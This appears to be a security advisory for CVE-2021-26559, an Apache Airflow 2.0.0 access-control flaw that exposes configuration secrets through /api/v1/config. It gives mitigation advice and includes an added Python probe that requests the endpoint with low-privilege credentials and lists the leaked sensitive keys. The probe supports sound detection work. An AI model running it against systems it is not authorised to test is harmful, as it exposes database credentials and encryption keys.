PT-2021-17037 · Apache · Apache Airflow

Ian Carroll · Published 2021-02-17 · Updated 2024-03-06

CVE-2021-26559

CVSS v4.0: 7.1 (High)
Vector: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: Apache Airflow version 2.0.0
Description: Improper access control on the configuration endpoint (GET /api/v1/config) of the Apache Airflow stable REST API lets authenticated users holding only the Viewer or User role retrieve the full Airflow configuration, including sensitive values such as the metadata database connection string and the Fernet key, even when `[webserver] expose_config = False` is set in airflow.cfg. Because the configuration can contain credentials, this disclosure enabled a privilege escalation attack.
Recommendations: Upgrade to Apache Airflow 2.0.1 or later, which fixes this issue. Changing `[webserver] expose_config` on 2.0.0 is not a workaround: the flaw is precisely that the API endpoint ignores `expose_config = False`. Until the upgrade is done, block or restrict `/api/v1/config` at the reverse proxy or network layer and limit who holds API-capable accounts; if low-privilege users may already have read the configuration, rotate the secrets it contains (database credentials, `fernet_key`, the webserver `secret_key`).
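The following probe is an added illustrative example, not code from this advisory, from Ian Carroll, or from the Airflow project. It checks whether a 2.0.x deployment answers GET /api/v1/config for a low-privilege account. It assumes the stable API is reachable at the given base URL with the basic-auth backend enabled (`[api] auth_backend = airflow.api.auth.backend.basic_auth`) and that the credentials belong to an account holding only the Viewer or User role; the sample response bodies are constructed, not captured from a real deployment. A 200 response with configuration sections on an instance whose airflow.cfg sets `expose_config = False` reproduces the issue; the list of sensitive keys tells you which secrets to rotate.

```python
"""Probe an Airflow 2.0.x stable API for CVE-2021-26559.

Question answered: does GET /api/v1/config return the configuration to a
Viewer/User-role account although [webserver] expose_config = False?

Usage: python probe_config_endpoint.py http://airflow.example:8080 viewer 'password'
(hypothetical host and credentials; assumes the basic_auth API backend)
"""
import base64
import json
import sys
import urllib.error
import urllib.request

# Real Airflow option names whose disclosure matters most.
SENSITIVE_KEYS = {"sql_alchemy_conn", "fernet_key", "secret_key", "broker_url", "result_backend"}


def find_sensitive_options(config_doc):
    """Return ["section.key", ...] for sensitive options in a /api/v1/config body.

    The stable API returns {"sections": [{"name": ..., "options": [{"key": ..., "value": ...}]}]}.
    """
    hits = []
    for section in config_doc.get("sections", []):
        for opt in section.get("options", []):
            if opt.get("key") in SENSITIVE_KEYS:
                hits.append(f"{section.get('name')}.{opt.get('key')}")
    return hits


def assess(status, body):
    """Classify the endpoint's answer to a low-privilege account.

    "VULNERABLE"      - 200 with configuration sections: the endpoint leaked
    "DENIED"          - 403: expected when expose_config=False or the role lacks Config read
    "UNAUTHENTICATED" - 401: credentials rejected, the probe is inconclusive
    "UNKNOWN"         - anything else
    """
    if status == 200:
        try:
            doc = json.loads(body)
        except ValueError:
            return "UNKNOWN"
        if isinstance(doc, dict) and doc.get("sections"):
            return "VULNERABLE"
        return "UNKNOWN"
    if status == 403:
        return "DENIED"
    if status == 401:
        return "UNAUTHENTICATED"
    return "UNKNOWN"


def probe(base_url, username, password, timeout=10):
    """Issue GET /api/v1/config with HTTP basic auth; return (status, body_text)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/v1/config", headers={"Accept": "application/json"}
    )
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


# Constructed sample bodies (not captured from a real deployment).
LEAKY_DOC = {"sections": [
    {"name": "core", "options": [
        {"key": "sql_alchemy_conn", "value": "postgresql+psycopg2://airflow:airflow@db/airflow"},
        {"key": "fernet_key", "value": "sample-fernet-key-value"}]},
    {"name": "webserver", "options": [{"key": "expose_config", "value": "False"}]},
]}
LEAKY_BODY = json.dumps(LEAKY_DOC)
DENIED_BODY = json.dumps({"detail": "Forbidden", "status": 403, "title": "Forbidden"})

if __name__ == "__main__":
    url, user, pw = sys.argv[1:4]
    status, body = probe(url, user, pw)
    verdict = assess(status, body)
    print(f"{status} -> {verdict}")
    if verdict == "VULNERABLE":
        print("sensitive options readable:", find_sensitive_options(json.loads(body)))
```

Run it against a staging copy first; a DENIED verdict from a known-good Viewer account is the expected result on 2.0.1 or later, and a VULNERABLE verdict on 2.0.0 confirms the advisory even with expose_config set to False.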

Fix

Apache Airflow 2.0.1

Weakness Enumeration

Improper Privilege Management (CWE-269)

Improper Access Control (CWE-284)

Related Identifiers

BIT-AIRFLOW-2021-26559
CVE-2021-26559
GHSA-FFW3-6MP6-JMVJ
PYSEC-2021-2

Affected Products

Apache Airflow